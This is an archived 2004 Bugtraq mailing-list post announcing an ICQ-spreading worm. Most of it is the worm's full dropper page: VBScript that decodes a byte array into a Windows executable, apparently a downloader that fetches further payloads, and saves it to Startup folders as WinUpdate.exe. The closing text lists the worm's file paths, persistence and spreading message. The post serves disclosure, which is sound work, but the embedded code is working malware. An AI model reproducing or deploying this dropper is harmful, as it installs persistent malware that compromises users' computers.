lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 24 Feb 2004 17:55:16 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: New ICQ WORM


The new ICQ WORM...spreading by 2 exploits on
http://www.jokeworld.biz/index.html
and uses icq to download a .chm file that uses the latest .chm exploit.
The chm file is downloaded as ab icq sound wav file, to icq sounds
directory.
the file iefucker.html from inside the .chm file is ran.

iefucker.html
--------------------------CUT HERE------------------------------

<body><html>

<script language="vbs">



 jelmersArray=
array(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,0,0,0,14,31
,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114
,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,7
9,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,105,164,7,157,45,197,10
5,206,45,197,105,206,45,197,105,206,71,217,107,206,60,197,105,206,45,197,105
,206,32,197,105,206,215,230,112,206,42,197,105,206,45,197,104,206,56,197,105
,206,215,225,116,206,44,197,105,206,215,225,84,206,44,197,105,206,82,105,99,
104,45,197,105,206,0,0,0,0,0,0,0,0,80,69,0,0,76,1,3,0,192,18,44,64,0,0,0,0,0
,0,0,0,224,0,15,1,11,1,7,0,0,6,0,0,0,8,0,0,0,0,0,0,192,18,0,0,0,16,0,0,0,32,
0,0,0,0,64,0,0,16,0,0,0,2,0,0,4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,64,0,0,0,4,0
,0,0,0,0,0,2,0,0,0,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,0,0,
0,0,0,0,0,0,20,33,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,160,32,0,0,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,152,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,204,4,0,0,0,16,0
,0,0,6,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,114,100,97,116,97,0,
0,141,4,0,0,0,32,0,0,0,6,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,1
00,97,116,97,0,0,0,68,1,0,0,0,48,0,0,0,2,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,64,0,0,192,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,85,
139,236,184,16,21,0,0,232,131,2,0,0,139,69,16,83,86,87,141,80,1,51,219,138,8
,64,58,203,117,249,43,194,131,248,1,15,134,238,1,0,0,106,100,255,21,0,32,64,
0,255,117,16,255,21,4,32,64,0,104,0,1,0,0,141,133,240,251,255,255,80,83,255,
21,56,32,64,0,83,83,106,3,83,106,1,104,0,0,0,128,141,133,240,251,255,255,80,
255,21,60,32,64,0,139,61,16,32,64,0,106,2,83,106,255,80,137,69,16,255,215,13
9,53,20,32,64,0,83,141,69,244,80,106,1,141,69,255,80,255,117,16,255,214,128,
125,255,42,15,133,131,0,0,0,106,2,83,106,251,255,117,16,255,215,83,141,69,24
4,80,106,4,141,69,248,80,255,117,16,255,214,106,2,83,106,251,88,43,69,248,80
,255,117,16,255,215,51,192,83,185,0,4,0,0,141,189,240,234,255,255,243,171,14
1,69,244,80,255,117,248,141,133,240,234,255,255,80,255,117,16,255,214,139,12
5,248,51,246,59,251,118,19,141,132,53,240,234,255,255,128,201,255,42,8,70,59
,247,136,8,114,237,136,156,61,240,234,255,255,51,192,138,140,5,240,234,255,2
55,136,136,32,48,64,0,64,58,203,117,238,255,117,16,255,21,24,32,64,0,190,0,0
,128,0,104,232,3,0,0,255,21,0,32,64,0,83,83,83,83,104,248,32,64,0,255,21,132
,32,64,0,83,83,83,83,104,32,48,64,0,80,163,36,49,64,0,255,21,136,32,64,0,59,
195,163,32,49,64,0,116,200,104,0,1,0,0,141,133,240,254,255,255,80,104,224,32
,64,0,255,21,28,32,64,0,83,104,128,0,0,0,106,2,83,83,104,0,0,0,64,141,133,24
0,254,255,255,80,255,21,60,32,64,0,131,248,255,137,69,16,116,141,83,86,83,25
5,21,32,32,64,0,86,139,248,106,8,87,255,21,36,32,64,0,141,77,240,81,86,80,25
5,53,32,49,64,0,137,69,248,255,21,140,32,64,0,133,192,15,132,91,255,255,255,
83,141,69,240,80,255,117,240,255,117,248,255,117,16,255,21,40,32,64,0,255,11
7,16,255,21,24,32,64,0,83,141,133,240,254,255,255,80,255,21,44,32,64,0,255,5
3,36,49,64,0,139,53,144,32,64,0,255,214,255,53,32,49,64,0,255,214,87,255,21,
48,32,64,0,235,111,190,0,1,0,0,86,141,133,240,253,255,255,80,83,255,21,56,32
,64,0,139,61,28,32,64,0,86,141,133,240,252,255,255,80,104,204,32,64,0,255,21
5,86,141,133,240,250,255,255,80,104,196,32,64,0,255,215,83,141,133,240,252,2
55,255,80,141,133,240,253,255,255,80,255,21,52,32,64,0,83,141,133,240,250,25
5,255,80,141,133,240,253,255,255,80,141,133,240,252,255,255,80,104,188,32,64
,0,83,255,21,124,32,64,0,95,94,51,192,91,201,194,16,0,81,61,0,16,0,0,141,76,
36,8,114,20,129,233,0,16,0,0,45,0,16,0,0,133,1,61,0,16,0,0,115,236,43,200,13
9,196,133,1,139,225,139,8,139,64,4,80,195,204,85,139,236,106,255,104,8,33,64
,0,104,192,20,64,0,100,161,0,0,0,0,80,100,137,37,0,0,0,0,131,196,152,83,86,8
7,137,101,232,199,69,252,0,0,0,0,106,2,255,21,72,32,64,0,131,196,4,199,5,56,
49,64,0,255,255,255,255,199,5,60,49,64,0,255,255,255,255,255,21,76,32,64,0,1
39,13,52,49,64,0,137,8,255,21,80,32,64,0,139,21,48,49,64,0,137,16,161,84,32,
64,0,139,8,137,13,64,49,64,0,232,118,1,0,0,161,16,48,64,0,133,192,117,14,104
,160,20,64,0,255,21,88,32,64,0,131,196,4,232,42,1,0,0,104,12,48,64,0,104,8,4
8,64,0,232,17,1,0,0,131,196,8,139,21,44,49,64,0,137,85,148,141,69,148,80,139
,13,40,49,64,0,81,141,85,156,82,141,69,144,80,141,77,160,81,255,21,96,32,64,
0,131,196,20,104,4,48,64,0,104,0,48,64,0,232,214,0,0,0,131,196,8,139,21,100,
32,64,0,139,50,137,117,140,128,62,34,15,133,168,0,0,0,70,137,117,140,138,6,1
32,192,116,4,60,34,117,242,128,62,34,117,4,70,137,117,140,138,6,132,192,116,
10,60,32,119,6,70,137,117,140,235,240,199,69,208,0,0,0,0,141,69,164,80,255,2
1,8,32,64,0,246,69,208,1,116,10,139,69,212,37,255,255,0,0,235,5,184,10,0,0,0
,80,86,106,0,106,0,255,21,12,32,64,0,80,232,234,251,255,255,137,69,152,80,25
5,21,104,32,64,0,235,34,139,69,236,139,8,139,9,137,77,136,80,81,232,61,0,0,0
,131,196,8,195,139,101,232,139,85,136,82,255,21,112,32,64,0,131,196,4,199,69
,252,255,255,255,255,139,77,240,100,137,13,0,0,0,0,95,94,91,139,229,93,195,1
28,62,32,15,134,102,255,255,255,70,137,117,140,235,241,144,144,255,37,108,32
,64,0,255,37,92,32,64,0,204,204,204,204,104,0,0,3,0,104,0,0,1,0,232,55,0,0,0
,131,196,8,195,144,144,144,144,144,144,144,144,144,144,144,144,144,51,192,19
5,144,144,144,144,144,144,144,144,144,144,144,144,144,195,144,144,144,144,14
4,144,144,144,144,144,144,144,144,144,144,255,37,116,32,64,0,255,37,68,32,64
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,244,35,0,0,230,35,0,0,16,36,0,0,252,35,0,0,176,35,0,0,164,35,0,0,
150,35,0,0,122,35,0,0,108,35,0,0,96,35,0,0,84,35,0,0,74,35,0,0,60,35,0,0,48,
35,0,0,208,35,0,0,194,35,0,0,0,0,0,0,34,35,0,0,240,34,0,0,226,34,0,0,210,34,
0,0,194,34,0,0,174,34,0,0,162,34,0,0,146,34,0,0,136,34,0,0,128,34,0,0,114,34
,0,0,106,34,0,0,2,35,0,0,0,0,0,0,48,36,0,0,0,0,0,0,78,34,0,0,58,34,0,0,38,34
,0,0,16,34,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,192,18,44,64,0,0,0,0,2,0,0,0,
65,0,0,0,76,36,0,0,76,14,0,0,111,112,101,110,0,0,0,0,37,84,69,77,80,37,92,0,
37,84,69,77,80,37,92,97,108,115,100,102,107,106,46,101,120,101,0,0,37,116,10
1,109,112,37,92,97,112,116,103,101,116,117,112,100,46,101,120,101,0,0,0,0,77
,111,122,105,108,108,97,47,53,46,48,0,0,0,0,0,255,255,255,255,34,20,64,0,55,
20,64,0,252,33,0,0,0,0,0,0,0,0,0,0,94,34,0,0,132,32,0,0,188,33,0,0,0,0,0,0,0
,0,0,0,22,35,0,0,68,32,0,0,120,33,0,0,0,0,0,0,0,0,0,0,34,36,0,0,0,32,0,0,244
,33,0,0,0,0,0,0,0,0,0,0,64,36,0,0,124,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,244,35,0,0,230,35,0,0,16,36,0,0,252,35,0,0,176,35,0,0,164,35,0,0,15
0,35,0,0,122,35,0,0,108,35,0,0,96,35,0,0,84,35,0,0,74,35,0,0,60,35,0,0,48,35
,0,0,208,35,0,0,194,35,0,0,0,0,0,0,34,35,0,0,240,34,0,0,226,34,0,0,210,34,0,
0,194,34,0,0,174,34,0,0,162,34,0,0,146,34,0,0,136,34,0,0,128,34,0,0,114,34,0
,0,106,34,0,0,2,35,0,0,0,0,0,0,48,36,0,0,0,0,0,0,78,34,0,0,58,34,0,0,38,34,0
,0,16,34,0,0,0,0,0,0,105,0,73,110,116,101,114,110,101,116,67,108,111,115,101
,72,97,110,100,108,101,0,154,0,73,110,116,101,114,110,101,116,82,101,97,100,
70,105,108,101,0,0,147,0,73,110,116,101,114,110,101,116,79,112,101,110,85,11
4,108,65,0,0,146,0,73,110,116,101,114,110,101,116,79,112,101,110,65,0,87,73,
78,73,78,69,84,46,100,108,108,0,208,0,95,101,120,105,116,0,72,0,95,88,99,112
,116,70,105,108,116,101,114,0,70,2,101,120,105,116,0,0,141,0,95,97,99,109,10
0,108,110,0,88,0,95,95,103,101,116,109,97,105,110,97,114,103,115,0,12,1,95,1
05,110,105,116,116,101,114,109,0,130,0,95,95,115,101,116,117,115,101,114,109
,97,116,104,101,114,114,0,0,155,0,95,97,100,106,117,115,116,95,102,100,105,1
18,0,0,105,0,95,95,112,95,95,99,111,109,109,111,100,101,0,0,110,0,95,95,112,
95,95,102,109,111,100,101,0,0,128,0,95,95,115,101,116,95,97,112,112,95,116,1
21,112,101,0,0,199,0,95,101,120,99,101,112,116,95,104,97,110,100,108,101,114
,51,0,0,77,83,86,67,82,84,46,100,108,108,0,0,180,0,95,99,111,110,116,114,111
,108,102,112,0,0,58,0,67,111,112,121,70,105,108,101,65,0,243,1,72,101,97,112
,68,101,115,116,114,111,121,0,106,3,87,105,110,69,120,101,99,0,118,3,87,114,
105,116,101,70,105,108,101,0,239,1,72,101,97,112,65,108,108,111,99,0,241,1,7
2,101,97,112,67,114,101,97,116,101,0,0,174,0,69,120,112,97,110,100,69,110,11
8,105,114,111,110,109,101,110,116,83,116,114,105,110,103,115,65,0,44,0,67,10
8,111,115,101,72,97,110,100,108,101,0,144,2,82,101,97,100,70,105,108,101,0,0
,241,2,83,101,116,70,105,108,101,80,111,105,110,116,101,114,0,0,74,0,67,114,
101,97,116,101,70,105,108,101,65,0,101,1,71,101,116,77,111,100,117,108,101,7
0,105,108,101,78,97,109,101,65,0,0,120,0,68,101,108,101,116,101,70,105,108,1
01,65,0,41,3,83,108,101,101,112,0,103,1,71,101,116,77,111,100,117,108,101,72
,97,110,100,108,101,65,0,0,156,1,71,101,116,83,116,97,114,116,117,112,73,110
,102,111,65,0,75,69,82,78,69,76,51,50,46,100,108,108,0,0,152,0,83,104,101,10
8,108,69,120,101,99,117,116,101,65,0,83,72,69,76,76,51,50,46,100,108,108,0,8
2,83,68,83,236,197,157,118,3,138,225,70,150,140,250,174,110,228,243,252,5,0,
0,0,103,58,92,33,87,111,114,107,92,95,95,67,117,114,114,101,110,116,92,95,10
0,95,101,92,82,101,108,101,97,115,101,92,95,100,95,101,46,112,100,98,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,151,139,139,143,197,208,208,136,136,136,209,138,140,139,141,158
,155,150,145,152,209,150,145,153,144,208,138,143,155,158,139,154,141,209,154
,135,154,37,0,0,0,42)


win2k="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
win2ok="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
winxp="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
winxpee="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
win98="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"
win98ate="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"

Function toString(payloadArray)
For Each arrayElement In payloadArray
toString = toString & ChrB(arrayElement)
Next
End Function
Const adTypeBinary = 1
Const adTypeText = 2
Const adSaveCreateOverWrite = 2

set jelmer = CreateObject("Adodb.Stream")
jelmer.Type = adTypeText
jelmer.Open
jelmer.WriteText toString(jelmersArray)
jelmer.Position = 0
jelmer.Type = adTypeBinary
jelmer.Position = 2
bytearray = jelmer.Read
jelmer.Close

set malware = CreateObject("Adodb.Stream")
malware.Type = adTypeBinary
malware.Open
malware.Write bytearray
On Error Resume Next
malware.savetofile(win2k), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win2ok), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxp), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxpee), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win98), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win9ate), adSaveCreateOverWrite
On Error Resume Next
malware.Close

</script>

</body></html>
--------------------------CUT HERE------------------------------

and then it writes
c:\documents and settings\all users\start menu\startup\winupdate.exe
c:\windows\start menu\startup\winupdate.exe
c:\windows\all users\start menu\startup\winupdate.exe

the next time the computer starts it will be loaded and will download
another to virus this locations

c:\documents and settings\<your user name>\local settings\temp\alsdfkj.exe
c:\documents and settings\<your user name>\local settings\temp\aptgetupd.exe

this files will create a "sysmon" folder inside the windows\system32
directory.

and this file
c:\windows\system32\sysmon\sysmon.exe
runs in the background and closing regedit if you want to deny it from
autoruning.

the worm uses ICQ to spread sending the following message to all the contact
list:
http://www.jokeworld.biz :) LOL

* This worm possibly opens a shell , hacking was reported on infected
machine
   This worm is raging at Israel this days.

Panda info team was notified.
Rafel Ivgi, The-Insider.
Thanks a lot to "the pull".

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ